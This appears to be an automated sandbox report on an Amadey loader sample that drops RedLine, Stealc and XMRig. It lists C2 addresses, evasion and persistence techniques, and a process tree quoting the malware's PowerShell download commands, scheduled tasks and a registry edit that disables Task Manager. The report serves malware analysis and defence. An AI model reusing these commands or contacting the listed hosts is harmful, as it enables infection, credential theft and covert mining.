amadey | c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93

Analysis

max time kernel
143s
max time network
148s
platform
windows11-21h2_x64
resource
win11-20240611-en
resource tags

arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
submitted
26-06-2024 23:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe
Size

1.8MB
MD5

5cce8686e206242b06755e8d3b980097
SHA1

e2817338b2d55f57189dc48634613187adca42d5
SHA256

c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93
SHA512

81c957a13d1667f722856a15c6ec07da3bd1676c72199971579fb1b6b2ba01e2466a35ddb8c7f1b6a4f3621ffd04b8ec2536bffe9e484f690e8c3a7fb1cd79f1
SSDEEP

49152:wgh0Oc345yOwAvHcIBZjoWi9zgncIV2NyJN/LhdCNQO73+:Vh0f3iN/cAoV6c2eyz/Lhsd73+

Score

10^/10

amadey redline stealc xmrig 06-25-24 123 @oleh_psp e76b71 jopa livetraffic discovery evasion execution infostealer miner persistence spyware stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

http://77.91.77.81

Attributes

install_dir
8254624243
install_file
axplong.exe
strings_key
90049e51fabf09df0d6748e0b271922e
url_paths
/Kiru9gu/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

4.184.236.127:1110

Extracted

Family

redline

Botnet

123

185.215.113.67:40960

Extracted

Family

redline

Botnet

@OLEH_PSP

185.172.128.33:8970

Extracted

Family

stealc

Botnet

jopa

http://65.21.175.0

Attributes

url_path
/108e010e8f91c38c.php

Extracted

Family

redline

Botnet

06-25-24

85.28.47.7:17210

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3360-38-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\1000110001\123.exe	family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\svhosts.exe	family_redline
behavioral2/memory/2832-226-0x0000000000E20000-0x0000000000E70000-memory.dmp	family_redline
behavioral2/memory/900-227-0x0000000000A50000-0x0000000000AA0000-memory.dmp	family_redline
behavioral2/memory/4232-329-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe

XMRig Miner payload 11 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/1680-411-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/1680-414-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/1680-417-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/1680-416-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/1680-415-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/1680-413-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/1680-410-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/1680-421-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/1680-429-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/1680-431-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/1680-430-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

18 3000 powershell.exe
19 3000 powershell.exe
20 4928 powershell.exe
21 4928 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

4984 powershell.exe
3000 powershell.exe
4928 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

flow	pid	process
18	3000	powershell.exe
19	3000	powershell.exe
20	4928	powershell.exe
21	4928	powershell.exe

pid	process
4984	powershell.exe
3000	powershell.exe
4928	powershell.exe

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

axplong.exeaxplong.exec6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exeaxplong.exeaxplong.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe

Executes dropped EXE 25 IoCs

Processes:

axplong.exegold.exeNewLatest.exeHkbsse.exeInstaller.exeldr.exeHkbsse.exealex5555555.exesvhosts.exe123.exeExplorers.exestl.exerig.exestl.exeHkbsse.exeaxplong.exeO3B6wY7ZkFhh.exestl.exeTpWWMUpe0LEV.exestl.exewfbrmcwrltkl.exeHkbsse.exeaxplong.exeHkbsse.exeaxplong.exe

pid	process
1428	axplong.exe
2828	gold.exe
4468	NewLatest.exe
2304	Hkbsse.exe
3096	Installer.exe
3384	ldr.exe
832	Hkbsse.exe
3564	alex5555555.exe
900	svhosts.exe
2832	123.exe
4688	Explorers.exe
4448	stl.exe
1580	rig.exe
1568	stl.exe
4876	Hkbsse.exe
4560	axplong.exe
584	O3B6wY7ZkFhh.exe
1772	stl.exe
4512	TpWWMUpe0LEV.exe
4232	stl.exe
3800	wfbrmcwrltkl.exe
4964	Hkbsse.exe
4544	axplong.exe
1300	Hkbsse.exe
2140	axplong.exe

Identifies Wine through registry keys 2 TTPs 5 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

axplong.exeaxplong.exeaxplong.exeaxplong.exec6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Wine	c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe

Loads dropped DLL 3 IoCs

Processes:

TpWWMUpe0LEV.exeaspnet_regiis.exe

pid process

4512 TpWWMUpe0LEV.exe
4844 aspnet_regiis.exe
4844 aspnet_regiis.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
4512	TpWWMUpe0LEV.exe
4844	aspnet_regiis.exe
4844	aspnet_regiis.exe

UPX packed file 16 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/1680-407-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1680-408-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1680-411-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1680-414-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1680-417-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1680-416-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1680-415-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1680-413-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1680-410-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1680-409-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1680-405-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1680-406-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1680-421-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1680-429-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1680-431-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1680-430-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Installer.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Installer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid process

4360 powercfg.exe
2516 powercfg.exe
392 powercfg.exe
3304 powercfg.exe
1392 powercfg.exe
3292 powercfg.exe
3296 powercfg.exe
3440 powercfg.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exe

pid process

4008 c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe
1428 axplong.exe
4560 axplong.exe
4544 axplong.exe
2140 axplong.exe

pid	process
4360	powercfg.exe
2516	powercfg.exe
392	powercfg.exe
3304	powercfg.exe
1392	powercfg.exe
3292	powercfg.exe
3296	powercfg.exe
3440	powercfg.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

gold.exealex5555555.exeTpWWMUpe0LEV.exestl.exewfbrmcwrltkl.exeO3B6wY7ZkFhh.exe

description	pid	process	target process
PID 2828 set thread context of 3360	2828	gold.exe	RegAsm.exe
PID 3564 set thread context of 4260	3564	alex5555555.exe	RegAsm.exe
PID 4512 set thread context of 4844	4512	TpWWMUpe0LEV.exe	aspnet_regiis.exe
PID 4448 set thread context of 4232	4448	stl.exe	stl.exe
PID 3800 set thread context of 1680	3800	wfbrmcwrltkl.exe	explorer.exe
PID 584 set thread context of 1804	584	O3B6wY7ZkFhh.exe	BitLockerToGo.exe

Drops file in Windows directory 3 IoCs

Processes:

c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exeNewLatest.exeldr.exe

description	ioc	process
File created	C:\Windows\Tasks\axplong.job	c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe
File created	C:\Windows\Tasks\Hkbsse.job	NewLatest.exe
File created	C:\Windows\Tasks\Hkbsse.job	ldr.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

3032 sc.exe
1764 sc.exe
3704 sc.exe
3428 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

3408 2828 WerFault.exe gold.exe
1620 3564 WerFault.exe alex5555555.exe

pid	process
3032	sc.exe
1764	sc.exe
3704	sc.exe
3428	sc.exe

pid	pid_target	process	target process
3408	2828	WerFault.exe	gold.exe
1620	3564	WerFault.exe	alex5555555.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

aspnet_regiis.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	aspnet_regiis.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	aspnet_regiis.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings powershell.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1300 reg.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4276 schtasks.exe
4668 schtasks.exe
3052 schtasks.exe
4292 schtasks.exe
4296 schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings	powershell.exe

pid	process
1300	reg.exe

pid	process
4276	schtasks.exe
4668	schtasks.exe
3052	schtasks.exe
4292	schtasks.exe
4296	schtasks.exe

Suspicious behavior: EnumeratesProcesses 47 IoCs

Processes:

c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exeaxplong.exepowershell.exepowershell.exepowershell.exeRegAsm.exeExplorers.exeaxplong.exesvhosts.exeaspnet_regiis.exe123.exestl.exerig.exewfbrmcwrltkl.exeaxplong.exeaxplong.exe

pid	process
4008	c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe
4008	c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe
1428	axplong.exe
1428	axplong.exe
3000	powershell.exe
3000	powershell.exe
4984	powershell.exe
4984	powershell.exe
4928	powershell.exe
4928	powershell.exe
3360	RegAsm.exe
3360	RegAsm.exe
3360	RegAsm.exe
4688	Explorers.exe
4560	axplong.exe
4560	axplong.exe
900	svhosts.exe
900	svhosts.exe
900	svhosts.exe
900	svhosts.exe
4844	aspnet_regiis.exe
4844	aspnet_regiis.exe
2832	123.exe
2832	123.exe
2832	123.exe
4844	aspnet_regiis.exe
4844	aspnet_regiis.exe
4232	stl.exe
4232	stl.exe
1580	rig.exe
1580	rig.exe
1580	rig.exe
1580	rig.exe
1580	rig.exe
1580	rig.exe
1580	rig.exe
1580	rig.exe
3800	wfbrmcwrltkl.exe
3800	wfbrmcwrltkl.exe
3800	wfbrmcwrltkl.exe
3800	wfbrmcwrltkl.exe
3800	wfbrmcwrltkl.exe
4232	stl.exe
4544	axplong.exe
4544	axplong.exe
2140	axplong.exe
2140	axplong.exe

Suspicious use of AdjustPrivilegeToken 32 IoCs

Processes:

powershell.exepowershell.exepowershell.exeExplorers.exestl.exeRegAsm.exesvhosts.exeRegAsm.exe123.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeexplorer.exestl.exe

description	pid	process
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	4984	powershell.exe
Token: SeDebugPrivilege	4928	powershell.exe
Token: SeDebugPrivilege	4688	Explorers.exe
Token: SeBackupPrivilege	4688	Explorers.exe
Token: SeSecurityPrivilege	4688	Explorers.exe
Token: SeSecurityPrivilege	4688	Explorers.exe
Token: SeSecurityPrivilege	4688	Explorers.exe
Token: SeSecurityPrivilege	4688	Explorers.exe
Token: SeDebugPrivilege	4448	stl.exe
Token: SeDebugPrivilege	3360	RegAsm.exe
Token: SeDebugPrivilege	900	svhosts.exe
Token: SeDebugPrivilege	4260	RegAsm.exe
Token: SeDebugPrivilege	2832	123.exe
Token: SeShutdownPrivilege	3304	powercfg.exe
Token: SeCreatePagefilePrivilege	3304	powercfg.exe
Token: SeShutdownPrivilege	4360	powercfg.exe
Token: SeCreatePagefilePrivilege	4360	powercfg.exe
Token: SeShutdownPrivilege	2516	powercfg.exe
Token: SeCreatePagefilePrivilege	2516	powercfg.exe
Token: SeShutdownPrivilege	392	powercfg.exe
Token: SeCreatePagefilePrivilege	392	powercfg.exe
Token: SeShutdownPrivilege	1392	powercfg.exe
Token: SeCreatePagefilePrivilege	1392	powercfg.exe
Token: SeShutdownPrivilege	3292	powercfg.exe
Token: SeCreatePagefilePrivilege	3292	powercfg.exe
Token: SeShutdownPrivilege	3440	powercfg.exe
Token: SeCreatePagefilePrivilege	3440	powercfg.exe
Token: SeShutdownPrivilege	3296	powercfg.exe
Token: SeCreatePagefilePrivilege	3296	powercfg.exe
Token: SeLockMemoryPrivilege	1680	explorer.exe
Token: SeDebugPrivilege	4232	stl.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exeaxplong.exegold.exeNewLatest.exeInstaller.execmd.exepowershell.execmd.exeldr.exealex5555555.exe

description	pid	process	target process
PID 4008 wrote to memory of 1428	4008	c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe	axplong.exe
PID 4008 wrote to memory of 1428	4008	c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe	axplong.exe
PID 4008 wrote to memory of 1428	4008	c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe	axplong.exe
PID 1428 wrote to memory of 2828	1428	axplong.exe	gold.exe
PID 1428 wrote to memory of 2828	1428	axplong.exe	gold.exe
PID 1428 wrote to memory of 2828	1428	axplong.exe	gold.exe
PID 2828 wrote to memory of 3360	2828	gold.exe	RegAsm.exe
PID 2828 wrote to memory of 3360	2828	gold.exe	RegAsm.exe
PID 2828 wrote to memory of 3360	2828	gold.exe	RegAsm.exe
PID 2828 wrote to memory of 3360	2828	gold.exe	RegAsm.exe
PID 2828 wrote to memory of 3360	2828	gold.exe	RegAsm.exe
PID 2828 wrote to memory of 3360	2828	gold.exe	RegAsm.exe
PID 2828 wrote to memory of 3360	2828	gold.exe	RegAsm.exe
PID 2828 wrote to memory of 3360	2828	gold.exe	RegAsm.exe
PID 1428 wrote to memory of 4468	1428	axplong.exe	NewLatest.exe
PID 1428 wrote to memory of 4468	1428	axplong.exe	NewLatest.exe
PID 1428 wrote to memory of 4468	1428	axplong.exe	NewLatest.exe
PID 4468 wrote to memory of 2304	4468	NewLatest.exe	Hkbsse.exe
PID 4468 wrote to memory of 2304	4468	NewLatest.exe	Hkbsse.exe
PID 4468 wrote to memory of 2304	4468	NewLatest.exe	Hkbsse.exe
PID 1428 wrote to memory of 3096	1428	axplong.exe	Installer.exe
PID 1428 wrote to memory of 3096	1428	axplong.exe	Installer.exe
PID 3096 wrote to memory of 1840	3096	Installer.exe	cmd.exe
PID 3096 wrote to memory of 1840	3096	Installer.exe	cmd.exe
PID 1840 wrote to memory of 3052	1840	cmd.exe	schtasks.exe
PID 1840 wrote to memory of 3052	1840	cmd.exe	schtasks.exe
PID 1840 wrote to memory of 4292	1840	cmd.exe	schtasks.exe
PID 1840 wrote to memory of 4292	1840	cmd.exe	schtasks.exe
PID 1840 wrote to memory of 3000	1840	cmd.exe	powershell.exe
PID 1840 wrote to memory of 3000	1840	cmd.exe	powershell.exe
PID 1428 wrote to memory of 3384	1428	axplong.exe	ldr.exe
PID 1428 wrote to memory of 3384	1428	axplong.exe	ldr.exe
PID 1428 wrote to memory of 3384	1428	axplong.exe	ldr.exe
PID 1840 wrote to memory of 4984	1840	cmd.exe	powershell.exe
PID 1840 wrote to memory of 4984	1840	cmd.exe	powershell.exe
PID 4984 wrote to memory of 2876	4984	powershell.exe	cmd.exe
PID 4984 wrote to memory of 2876	4984	powershell.exe	cmd.exe
PID 1840 wrote to memory of 4928	1840	cmd.exe	powershell.exe
PID 1840 wrote to memory of 4928	1840	cmd.exe	powershell.exe
PID 2876 wrote to memory of 4296	2876	cmd.exe	schtasks.exe
PID 2876 wrote to memory of 4296	2876	cmd.exe	schtasks.exe
PID 3384 wrote to memory of 832	3384	ldr.exe	Hkbsse.exe
PID 3384 wrote to memory of 832	3384	ldr.exe	Hkbsse.exe
PID 3384 wrote to memory of 832	3384	ldr.exe	Hkbsse.exe
PID 2876 wrote to memory of 1300	2876	cmd.exe	reg.exe
PID 2876 wrote to memory of 1300	2876	cmd.exe	reg.exe
PID 2876 wrote to memory of 4276	2876	cmd.exe	schtasks.exe
PID 2876 wrote to memory of 4276	2876	cmd.exe	schtasks.exe
PID 2876 wrote to memory of 4668	2876	cmd.exe	schtasks.exe
PID 2876 wrote to memory of 4668	2876	cmd.exe	schtasks.exe
PID 1428 wrote to memory of 3564	1428	axplong.exe	alex5555555.exe
PID 1428 wrote to memory of 3564	1428	axplong.exe	alex5555555.exe
PID 1428 wrote to memory of 3564	1428	axplong.exe	alex5555555.exe
PID 3564 wrote to memory of 2224	3564	alex5555555.exe	RegAsm.exe
PID 3564 wrote to memory of 2224	3564	alex5555555.exe	RegAsm.exe
PID 3564 wrote to memory of 2224	3564	alex5555555.exe	RegAsm.exe
PID 3564 wrote to memory of 4260	3564	alex5555555.exe	RegAsm.exe
PID 3564 wrote to memory of 4260	3564	alex5555555.exe	RegAsm.exe
PID 3564 wrote to memory of 4260	3564	alex5555555.exe	RegAsm.exe
PID 3564 wrote to memory of 4260	3564	alex5555555.exe	RegAsm.exe
PID 3564 wrote to memory of 4260	3564	alex5555555.exe	RegAsm.exe
PID 3564 wrote to memory of 4260	3564	alex5555555.exe	RegAsm.exe
PID 3564 wrote to memory of 4260	3564	alex5555555.exe	RegAsm.exe
PID 3564 wrote to memory of 4260	3564	alex5555555.exe	RegAsm.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe
"C:\Users\Admin\AppData\Local\Temp\c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4008

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1428

C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2828

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2828 -s 300
4⤵
- Program crash
PID:3408

C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
"C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4468

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
4⤵
- Executes dropped EXE
PID:2304

C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3096

C:\Windows\SYSTEM32\cmd.exe
cmd /c ins.bat
4⤵
- Suspicious use of WriteProcessMemory
PID:1840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
5⤵
- Scheduled Task/Job: Scheduled Task
PID:3052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
5⤵
- Scheduled Task/Job: Scheduled Task
PID:4292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4984

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat"
6⤵
- Suspicious use of WriteProcessMemory
PID:2876

C:\Windows\system32\schtasks.exe
schtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
7⤵
- Scheduled Task/Job: Scheduled Task
PID:4296

C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
7⤵
- Modifies registry key
PID:1300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
7⤵
- Scheduled Task/Job: Scheduled Task
PID:4276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
7⤵
- Scheduled Task/Job: Scheduled Task
PID:4668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4928

C:\Users\Admin\AppData\Local\Temp\1000108001\ldr.exe
"C:\Users\Admin\AppData\Local\Temp\1000108001\ldr.exe"
3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3384

